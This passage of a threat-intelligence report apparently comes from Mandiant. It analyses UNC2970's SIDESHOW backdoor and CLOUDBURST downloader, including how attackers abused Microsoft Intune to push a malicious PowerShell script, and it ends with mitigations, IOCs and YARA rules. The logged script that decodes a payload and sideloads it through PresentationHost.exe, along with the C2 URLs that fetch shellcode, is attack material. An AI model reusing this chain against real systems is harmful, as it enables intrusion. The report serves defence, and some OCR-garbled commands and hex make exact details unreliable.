SIDESHOW parses the command response body and extracts data following the string <!DOCTYPE html>. SIDESHOW then appears to Base64 decode and RC6 decrypt the extracted data. SIDESHOW responds to the commands listed in Table 1 (commands are described on a best effort basis).



Figure 21: Switch statement following parsing of command

Table 1: Commands supported by SIDESHOW

Command Description

- 00 Get lightweight system information and a few configuration details 01 Enumerate drives and list free space 02 List files in directory 03 Execute arbitrary command via CreateProccess () and return output Likely zip directory to create password protected ZIP file with password 04 AtbsxjCiD2axc*ic[3</8Ad81!G./1kiThAfkgnw 05 Download file to system 06 Execute process 07 Execute process and spoof parent process identifier (PID) Execute PE payload via process injection for specified PID 08 09 Execute PE payload via loading into malware's memory space List running processes and loaded DLLs 0A 0в Terminate process 0C Securely delete a file by first writing random data and then calling DeleteFile() Connect to specified IP address and port -- use unknown 0D 0E Not implemented 0F Set current directory Timestomp a file using another file's timestamp 10
- 11 Update beacon interval

- ¹² Update beacon interval and save configuration to disk
- ¹³ Clean up by securely deleting supporting files, registry values, services, and exit
- 14 Load configuration from disk
- 15 Update configuration and save to disk
- 16 Get size of all files in a directory
- 17 Get specified drive's free disk space
- ¹⁸ Suspend a process
- 19Suspend a process
- 1A Load DLL in another process
- ^{1B} Unload DLL in another process
- IC
 Copy file to another location
- ID
 Remove directory
- 1E Move file to another location
- 1F Execute shellcode payload via process injection for specified PID
- 20 Execute shellcode payload via loading into malware's memory space
- 21 Get networking configuration information
- 22 Query or modify settings on a Windows Domain Controller
- 23 Query or modify system's firewall settings
- List active TCP and UDP connections
- Ping a remote system via ICMP requests -- usage unknown
- 26 Query or modify system's registry
- 27 Query or modify system's services
- Ping a remote system via ICMP requests -- usage unknown
- ²⁹ Get domain and user account name for which the malware's process is running under
- 2A Execute WMI command
- ^{2B} Resolve domain name via DNS query
- 2C Query or modify system's scheduled tasks
- 2D Get heavyweight system information
- 2E Get networking interface information
- 2F Create directory
- 30 List files in directory

Reaching for the Clouds: Intune with CLOUDBURST

In at least one investigation, Mandiant identified the threat actors leveraging Microsoft Intune, Microsoft's endpoint management solution, to deploy malware to hosts in the environment. Mandiant suspects that this method of malware deployment was used due to the absence of a VPN solution for remote machines. In order to remotely execute code, the attackers leveraged the Microsoft Intune management extension (IME) to upload custom PowerShell scripts containing malicious code to various hosts in the client environment. While conducting forensic analysis on a host, Mandiant identified the following Microsoft IME related PowerShell script command line arguments:

```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -executionPolicy bypass -
file "C:\Program Files (x86)\Microsoft Microsoft IME\Policies\Scripts\42fb3cca-48dd-4412-alla-
245384544402_f39leded-82d3-4506-8bf4-9213f6f4d586.ps1
```

At the time of analysis, Mandiant was unable to acquire the PS1 file itself, however; Mandiant was able to acquire a full copy of the PS1 file from local Microsoft IME logs identified on a host, located at:

 $\verb|C:\ProgramData\Microsoft\IntuneManagementExtension\Logs\IntuneManagementExtension-YYYYMMDD-HHMMSS.log||| \\$

The entry in the local logs appeared as follows:

```
<![LOG[[PowerShell] response payload is [{"AccountId":"[userGUID]","PolicyId":"f39leded-82d3-4506-8bf4-
92l3f6f4d586","PolicyType":1,"DocumentSchemaVersion":"1.0","PolicyHash":"P23cVfMyHLECSGPt1T6YYcoxhCLWKS05jX5M
ukc3MIw=","PolicyBody":"$EnModule = \"[Base64_encoded_CLOUDBURST_payload]"\r\n$DeModule =
[System.Convert]::FromBase64CharArray($EnModule, 0, &EnModule.Length)\r\nSet-Content
\"C:\\ProgramData\\mscoree.dll\" -Value $DeModule -Encoding Byte\r\nCopy-Item
\"C:\\Windows\\System32\\PresentationHost.exe\" -Destination \"C:\\ProgramData\"r\nStart-Process -
NoNewWindow -FilePath \"C:\\ProgramData\\PresentationHost.exe\" -ArgumentList \"-
embeddingObject\"\r\n","PolicyBodySize":null,"PolicyScriptParameters":null,"ContentSignature":"
[Base64_encoded_signing_certificate]", "isTombStoned":false,"isRecurring":false,"isFulSync":false,"ExecutionContext
"InternalVersion":1,"EnforceSignatureCheck":false,"RunningMode":1,"RemediationScript":null,"RunRemediation":false,"
RemediateScriptHash":null, "RemediationScriptParameters":null, "ComplianceRules":null,"ExecutionFrequency":0,"
RetryCount":0,"BlockExecutionNotifications":false,"ModifiedTime":null,"Schedule":null,"IsFirstPartyScript":false,"T
"ScriptApplicabilityStateDueToAssignmentFilters":null,"AssignmentFilterIdToEvalStateMap":
{},"HardwareConfigurationMetadat":null}]]LOG]!><ti>time="06:59:15.2941778" date="6-9-2022" component="IntuneManagemen
context="" type="1" thread="5" file="">
```

The malicious PowerShell script was used to decode the Base64 encoded CLOUDBURST payload and drop it on disk as C:\ProgramData\mscoree.dll. The script would then write a copy of

C:\Windows\System32\PresentationHost.exe to C:\ProgramData and execute it with the argument - embeddingObject.PresentationHost.exe is a legitimate Windows binary used by UNC2970 to sideload CLOUDBURST.

Upon execution, PresentationHost.exe would load the CLOUDBURST payload into memory. Upon further analysis of the Microsoft IME endpoint logs, Mandiant identified a unique GUID, f391eded-82d3-4506-8bf4-9213f6f4d586, in the PolicyID field, which is a "Unique identifier of the Policy in the data warehouse". The Intune Data Warehouse provides insight and information about an enterprise mobile environment, such as historical Intune data and Intune data refreshed on a daily occurence. The identified GUID also matched the GUID of the PowerShell script file name and the GUID observed in an IME associated registry key.

When reviewing the Intune Tenant admin Audit logs, Mandiant identified the same GUID under the ObjectID field. The Intune Tenant audit logs shows records of activities that generate a change in Intune, including create, update (edit), delete, assign, and remote actions. The logs revealed that the threat actors used a previously compromised account to perform a create, assign, patch, and finally a delete action of a Device Management Script, using the Target Microsoft.Management.Services.Api.DeviceManagementScript and the GroupID f391eded-82d3-4506-8bf4-9213f6f4d586.

Further analysis revealed that ObjectID GUIDs referenced in the Intune Tenant admin Audit logs maps to the ID of Mobile App assignment groups.

At the time of analysis, the GroupID f391eded-82d3-4506-8bf4-9213f6f4d586, was no longer present in the Intune Endpoint management admin center, and was likely deleted by the threat actors.

In order to determine malicious usage of Microsoft Intune, Mandiant performed the following analysis steps:

- 1. Analyzed AzureAD sign-in logs for evidence of suspicious logons to the Microsoft Intune application
 - Analyzed Microsoft Intune audit logs for evidence of unexpected deployments and performed the following:
 - Utilized the GroupID GUID to search for the presence of the following endpoint artifacts:
 - 1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IntuneManagementExtension\Policies\ <UserGUID>\<suspicious ObjectID GUID>
 - 2.C:\Program Files (x86)\Microsoft *Microsoft IME*\Policies\Scripts\
 - <UserGUID>_<suspicious ObjectID GUID>.ps1
- 2. For hosts that had the aforementioned artifacts, the following was performed:
 - Acquired the PS1 file(s) and analyzed for malicious code
 - Performed traditional endpoint analysis

Mandiant tracks the malware being distributed via InTune as CLOUDBURST. CLOUDBURST is a downloader written in C that communicates via HTTP. The malware attempts to make itself look like a legitimate version of mscoree.dll, but contains fake exports, the same way that TOUCHSHIFT uses fake exports. One variant of CLOUDBURST made use of legitimate open-source software that was added as exports, in addition to the fake exports. The actual export with malicious code is CorExitProcess. The CorExitProcessexport expects the single argument *-embeddingObject*.

		Ý v
3		
180006880		
180006880	loc_180006880:	
180006880	movzx eax, [rbp+rbx+	<+var_28]
180006885	cmp byte ptr [rbp+	p+rbx+var_48], al ; Var 28 = Command line argument
180006885		; Var 48 = -embeddingObject
180006889	jnz short loc_1800	30068A2
	🛄 🚄 🖼	
	00000018000688	38B inc rbx
	00000018000688	38E cmp rbx, 10h
	00000018000689	392 jl short loc_180006880

Figure 22: Comparing command line argument with -embeddingObject

Once the aforementioned command line argument has been verified, CLOUDBURST builds the domain as a stack string, and sends out the two following requests to the C2 server:

hxxps://[c2domain]/wp-content/plugins/contact.php?gametype= <random_dword>&type=08Akm8aV09Nw412KMoWJd hxxps://[c2domain]/wp-content/plugins/contact.php?gametype=tennis&type=k<random_dword>

Following the network connections, CLOUDBURST conducts a host survey, in which it will determine the Product Name, Computer Name, and enumerate running processes.

180005A73	call	QueryProductNameRegKey		
180005A78	lea	rcx, [rbx+100h]		
180005A7F	call	QueryComputerName		
180005A84	lea	rdx, [rbx+104h]		
180005A8B	lea	rcx, [rbx+108h]		
180005A92	call	EnumerateProcesses		
Figure 23: Calling functions to enumerate the host				

Upon completion of the host enumeration, CLOUDBURST then downloads and executes shellcode from the C2 server. At this time, Mandiant was unable to recover and identify the purpose of the shellcode downloaded by CLOUDBURST.

```
1800066CA call
                 cs:VirtualAlloc
1800066D0 movsxd r9, dword ptr [r13+10h] ; MaxCount
1800066D4 lea
               r8, [r13+14h] ; Src
                                 ; Dst
1800066D8 mov
                 rcx, rax
                 rdx, rbx
1800066DB mov
                                 ; DstSize
1800066DE mov
                 rdi, rax
                 memcpy_s
1800066E1 call
1800066E6 call
                 rdi
```

Figure 24: Allocating and populating memory space, and executing the shellcode

Outlook and Implications

The identified malware tools highlight continued malware development and deployment of new tools by UNC2970. Although the group has previously targeted defense, media, and technology industries, the targeting of security researchers suggests a shift in strategy or an expansion of its operations. Technical indicators and the group's TTPs link it to TEMP.Hermit, although this latest activity suggests the group is adapting their capabilities as more of their targets move to cloud services. To learn more about how UNC2970 further enabled its operations, please see part two of our research.

Campaign Tracking

Mandiant will continue to monitor UNC2970's campaigns and intrusion operations and will provide notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or the use of new infrastructure to carry out their mission.

For more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature within Mandiant Advantage Threat Intelligence.

Recommended Mitigations

Hardening Azure AD and Microsoft Intune

Mandiant has observed UNC2970 leverage weak identity controls in Azure AD combined with Microsoft Intune's endpoint management capabilities to effectively deploy malicious PowerShell scripts onto unsuspecting endpoints.

Increasing Azure AD identity protections and limiting access to Microsoft Intune is essential in mitigating the attacker activity observed by Mandiant. Organizations should consider implementing the following hardening controls:

Cloud-Only Accounts: Organizations should utilize cloud-only accounts for privileged access within Azure AD (e.g., Global Admins, Intune Administrator) and <u>never</u> assign privileged access to synced accounts from on-premises identity providers such as Active Directory. Additionally, admins should utilize a separate "daily-driver" account for day-to-day activities such as sending email or web-browsing. Dedicated admin accounts should be utilized to carry out administrative functions <u>only</u>.

Enforce Strong Multi-Factor Authentication Methods: Organizations should consider enforcing enhanced and phishing-resistant Multi-Factor Authentication (MFA) methods for all users and administrators. Weak MFA methods commonly include SMS, Voice (phone call), OTPs, or Push notifications and should be considered for removal. MFA enhancements for non-privileged users should include contextual information regarding the MFA request such as number-matching, application name, and geographic location. For privileged accounts, Mandiant recommends the enforcement of hardware tokens or FIDO2 Security Keys as-well as requiring MFA per each sign-in regardless of location (e.g., Trusted Network, Corporate VPN). As an initial roll out for enhanced MFA methods, organizations should focus on all accounts with administrative privileges in Azure AD. Microsoft has additional information regarding contextual MFA settings.

Privileged Identity Management (PIM) Solution: Mandiant recommends that organizations consider utilizing a PIM solution. A PIM solution should include a Just-In-Time (JIT) access capability which will provide access when requested, for a specific duration of time, and should initiate an approval flow, prior to providing an account access to a highly privileged role (e.g., Global Administrator or Intune Administrator).

Conditional Access Policies (CAPs) to Enforce Security Restrictions in Azure AD: A CAP allows organizations to set requirements for accessing cloud apps such as Intune, based on various conditions including location and device platform. Mandiant recommends that Organizations utilize CAPs to restrict Azure administrative functions to only compliant and registered devices in Azure AD and only from a specific subset of trusted IPs or ranges. Microsoft has more information on leveraging CAPs to access Cloud Apps.

Azure Identity Protection: Azure Identity Protection is a security feature within Azure Active Directory that allows organizations to automate the detection and remediation of identity-based risks. Identity Protection analyzes user account activity as-well as sign-in activity to identify potentially compromised accounts or unauthorized authentication requests. Identity Protection data can be leveraged to enhance Conditional Access Policies by enforcing access controls based on user or sign-in risk. Additionally, Identity Protection risk data should be exported to a Security Information and Event Management (SIEM) solution for further correlation and analysis. **Note:** Azure Identity Protection requires an Azure AD Premium P2 License.

Multi Admin Approval with Intune: To prevent unauthorized changes, organizations utilizing Intune should implement the Multi Admin Approval feature. This feature enforces a multiple administrative approval process that requires secondary admin approval before modifying or creating Script and App deployments. **Note:** As of February 2023, Multi Admin Approval is in Public Preview and does not yet support request notifications. Requests will need to be manually communicated to expedite the approval workflow. Microsoft has more information regarding Multi Admin Approval.

Additional Security Controls

Block Office Macros: While Microsoft has changed the default behavior of Office applications to block macros from the internet, Mandiant still recommends Organizations proactively deploy policies to control and enforce the behavior of office files containing macros. Microsoft has more information on using policies to manage how Office handles macros.

Disable Disk Image Auto-Mount: Mandiant has observed UNC2970 utilize trojanized ISO files containing malicious payloads to bypass security controls and trick victims into executing malware. On Windows systems, the option to mount an ISO by "*right-clicking*" the file then selecting "*Mount*" from the context menu can be removed by deleting the registry keys associated with image file types (.iso, .img, .vhd, .vhdx). Deleting these registry keys will also prevent a user from auto-mounting an image file by "*double-clicking*" the file.

Enhance PowerShell Logging: Increase PowerShell logging to provide security engineers and investigators the visibility needed to detect malicious activity and provide a historical record of how PowerShell was used on systems. For additional details regarding enhancing PowerShell logging, please reference to the Mandiant blog post, "Greater Visibility Through PowerShell Logging".

Signature

Indicators of Compromise

IOC

	Signature
e97b13b7e91edeceeac876c3869cc4eb	PLANKWALK
a9e30c16df400c3f24fc4e9d76db78ef	PLANKWALK
f910ffb063abe31e87982bad68fd0d87	PLANKWALK
30358639af2ecc217bbc26008c5640a7	LIDSHIFT
41dcd8db4371574453561251701107bc	LIDSHOT
866f9f205fa1d47af27173b5eb464363	TOUCHSHIFT
8c597659ede15d97914cb27512a55fc7	TOUCHSHIFT
a2109276dc704dedf481a4f6c8914c6e	TOUCHSHIFT
3bf748baecfc24def6c0393bc2354771	TOUCHSHOT
91b6d6efa5840d6c1f10a72c66e925ce	TOUCHKEY
300103aff7ab676a41e47ec3d615ba3f	HOOKSHOT
49425d6dedb5f88bddc053cc8fd5f0f4	TOUCHMOVE
abd91676a814f4b50ec357ca1584567e	SIDESHOW
05b6f459be513bf6120e9b2b85f6c844	CLOUDBURST
hxxp://webinternal.anyplex[.]com/images/query_image.jsp	PLANKWALK C2
hxxp://www.fainstec[.]com/assets/js/jquery/jquery.php	PLANKWALK C2
hxxps://ajayjangid[.]in/js/jquery/jquery.php	PLANKWALK C2
hxxps://sede.lamarinadevalencia[.]com/tablonEdictal/layout/contentLayout.jsp	PLANKWALK C2
hxxps://leadsblue[.]com/wp-content/wp-utility/index.php	LIDSHOT C2

hxxps://toptradenews[.]com/wp-content/themes/themes.php	SIDESHOW C2
hxxp://mantis.quick.net[.]pl/library/securimage/index.php	SIDESHOW C2
hxxp://www.keewoom.co[.]kr/prod_img/201409/prod.php	SIDESHOW C2
hxxp://abba-servicios[.]mx/wordpress/wp-content/themes/config.php	SIDESHOW C2
hxxp://www.ruscheltelefonia[.]com.br/public/php/index.php	SIDESHOW C2
hxxps://olidhealth[.]com/wp-includes/php-compat/compat.php	CLOUDBURST C2
hxxps://doug[.]org/wp-includes/admin.php	CLOUDBURST C2
hxxps://crickethighlights[.]today/wp-content/plugins/contact.php	CLOUDBURST C2

Mandiant Security Validation Actions

Organizations can validate their security controls using the following actions with Mandiant Security Validation.

VID Name

A105-491 Command and Control - QUESTDOWN, Exfiltration, Variant #1 A105-492 Command and Control - QUESTDOWN, Exfiltration, Variant #2 A105-493 Command and Control - QUESTDOWN, Next Stage Download Attempt, Variant #1 A105-494 Command and Control - QUESTDOWN, Status, Variant #1 A105-507 Phishing Email - Malicious Attachment, PLANKWALK Downloader, Variant #1 A105-508 Phishing Email - Malicious Attachment, QUESTDOWN Dropper, Variant #1 A105-514 Protected Theater - QUESTDOWN, Execution, Variant #1 S100-218 Malicious Activity Scenario - Campaign 22-046, QUESTDOWN Infection

Signatures

PLANKWALK

```
rule M_Hunt_APT_PLANKWALK_Code_String {
    meta:
        author = "Mandiant"
        description = "Detects a format string containing code and token found in PLANKWALK"
    strings:
        $hex = { 63 6F 64 65 [1-6] 3D 25 64 26 [1-6] 75 73 65 72 [1-6] 3D 25 73 26 [1-6] 74 6F 6B 65
    }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $hex
}
```

LIDSHIFT

```
rule M APT Loader Win LIDSHIFT 1 {
```

meta:

```
author = "Mandiant"
```

description = "Detects LIDSHIFT implant"

strings:

```
$anchor1 = "%s:%s:%s" ascii
```

```
$encloop = { 83 ?? 3F 72 ?? EB ?? 8D ?? ?? B8 ?? 41 10 04 F7 ?? 8B ?? 2B ?? D1 ?? 03 ??
C1 ?? 05 6B ?? 3F 2B ?? 42 0F ?? ?? ?? 41 ?? ?? }
```

condition:

```
uint16(0) == 0x5a4d and all of them
```

}

LIDSHOT

```
rule M_APT_Loader_Win_LIDSHOT_1 {
  meta:
    author = "Mandiant"
    description = "Detects LIDSHOT implant"
```

```
strings:
```

\$code1 = { 4C 89 6D ?? 4C 89 6D ?? C7 45 ?? 01 23 45 67 C7 45 ?? 89 AB CD EF C7 45 ?? FE DC BA 98 C7 45 ?? 76 54 32 10 4C 89 6C 24 ?? 48 C7 45 ?? 0F 00 00 00 C6 44 24 ?? 00 }

\$code2 = { B8 1F 85 EB 51 41 F7 E8 C1 FA 03 8B CA C1 E9 1F 03 D1 6B CA 19 }
\$code3 = { C7 45 ?? 30 6B 4C 6C 66 C7 45 ?? 55 00 }
condition:

```
uint16(0) == 0x5a4d and all of them
```

}

CLOUDBURST

```
rule M_APT_Loader_Win_CLOUDBURST_1 {
    meta:
        author = "Mandiant"
        strings:
$anchor1 = "Microsoft Enhanced Cryptographic Provider v1.0" ascii wide
$code1 = { 74 79 70 }
$code2 = { 65 71 75 69 }
$code3 = { 62 6F 78 69 }
$code4 = { E8 ?? ?? ?? FF C6 B8 99 99 99 97 FE D1 FA 8B C2 C1 E8 1F 03 D0 8D 04 16 8D 34
90 85 F6 75 ?? }
$str1 = "%s%x"
        condition:
```

uint16(0) == 0x5a4d and all of them

}

TOUCHSHIFT

```
rule M_DropperMemonly_TOUCHSHIFT_1 {
    meta:
        author = "Mandiant"
        description = "Hunting rule for TOUCHSHIFT"
    strings:
        $p00_0 = {0943??eb??ff43??b0??eb??e8[4]c700[4]e8[4]32c0}
        $p00_1 = {4c6305[4]ba[4]4c8b0d[4]488b0d[4]ff15[4]4c6305[4]ba[4]4c8b0d[4]488b0d}
        condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
        (
            ($p00_0 in (70000..90000) and $p00_1 in (0..64000))
        )
}
```

SIDESHOW

```
rule M_APT_Backdoor_Win_SIDESHOW_1 {
```

meta:

author = "Mandiant"

description = "Detects string deobfuscation function in SIDESHOW, may also detect other variants of malware from the same actor" $\,$

strings:

\$code1 = { 41 0F B6 ?? 33 ?? 48 ?? ?? 0F 1F 80 00 00 00 3A ?? 74 ?? FF ?? 48 FF ?? 83 ?? 48 72 ?? EB ?? 41 0F ?? ?? 2B ?? ?? 39 8E E3 38 83 ?? 48 F7 ?? C1 ?? 04 8D ?? ?? C1 ?? 03 2B ?? ?? 39 8E E3 38 } condition:

uint16(0) == 0x5a4d and (all of them)

TOUCHKEY

}

```
rule M_Hunting_TOUCHKEY {
```

```
meta:
    author = "Mandiant"
```

```
description = "Hunting rule For TOUCHKEY"
```

strings:

```
$a1 = "Normal.dost"
$a2 = "Normal.docb"
$c1 = "[SELECT]" ascii wide
$c2 = "[SLEEP]" ascii wide
$c3 = "[LSHIFT]" ascii wide
$c4 = "[RSHIFT]" ascii wide
$c5 = "[ENTER]" ascii wide
$c6 = "[SPACE]" ascii wide
condition:
   (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550
```

and filesize < 200KB and (5 of (c^*)) and al and al

}

TOUCHSHOT

```
rule M_Hunting_TOUCHSHOT {
    meta:
        author = "Mandiant"
        description = "Hunting rule For TOUCHSHOT"
    strings:
        $path = "%s\\Microsoft\\Windows\\Themes\\" wide
        $format = "%04d%02d%02d-%02d%02d%02d"
        $s1 = "EnumDisplaySettingsExW" ascii
        $s2 = "GetSystemMetrics" ascii
        $s3 = "GetDC" ascii
        $s5 = "ReleaseDC" ascii
        condition:
        (uintl6(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550
        and filesize < 200KB and (3 of ($s*)) and $path and $format</pre>
```

}

HOOKSHOT

```
rule M_Hunting_HOOKSHOT {
```

```
meta:
```

```
author = "autopatt"
```

description = "Hunting rule for HOOKSHOT"

strings:

\$p00_0 = {8bb1[4]408873??85f675??488b81[4]488b88[4]4885c974??e8}

```
$p00_1 = {8bf3488bea85db0f84[4]4c8d2d[4]66904c8d4424??8bd6488bcd}
condition:
    uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
    (
        ($p00_0 in (470000..490000) and $p00_1 in (360000..380000))
    )
```

Acknowledgements

}

Special thanks to John Wolfram, Rich Reece, Colby Lahaie, Dan Kelly, Joe Pisano, Jeffery Johnson, Fred Plan, Omar ElAhdan, Renato Fontana, Daniel Kennedy, and all the members of Mandiant Intelligence and Consulting that supported these investigations. We would also like to thank Lexie Aytes for creating Mandiant Security Validation (MSV) actions, as well as Michael Barnhart, Jake Nicastro, Geoff Ackerman, and Dan Perez for their technical review and feedback.